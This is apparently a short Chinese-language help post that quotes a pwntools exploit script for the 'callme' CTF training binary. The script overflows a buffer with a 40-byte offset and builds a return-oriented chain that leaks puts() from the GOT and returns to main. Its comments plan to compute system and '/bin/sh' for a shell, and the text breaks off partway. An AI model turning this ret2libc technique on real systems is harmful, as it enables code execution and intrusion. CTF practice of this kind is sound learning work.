我尝试了这段代码:
\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom pwn import *\n\nelf = context.binary = ELF(args.EXE or 'callme')\nlibc = elf.libc\nrop = ROP([elf, libc])\npop_rdi = p64(0x00000000004009a3)\nret = p64(0x00000000004006be)\n\ndef start(argv=[], *a, **kw):\n '''Start the exploit against the target.'''\n if args.GDB:\n return gdb.debug([elf.path] + argv, gdbscript=gdbscript, *a, **kw)\n else:\n return process([elf.path] + argv, *a, **kw)\n\ngdbscript = '''\nbreak *pwnme+89\ncontinue\n'''.format(**locals())\n\noffset = b'A' * 40\n\n'''\n1. print a leak to the address in libc in puts()'s GOT\n2. grab that leak, calculate system and '/bin/sh'\n3. call it. GG\n'''\n\nrop.raw(offset)\nrop.call('puts', [elf.got['puts']])\nrop.call('main')\n\n\n\nio …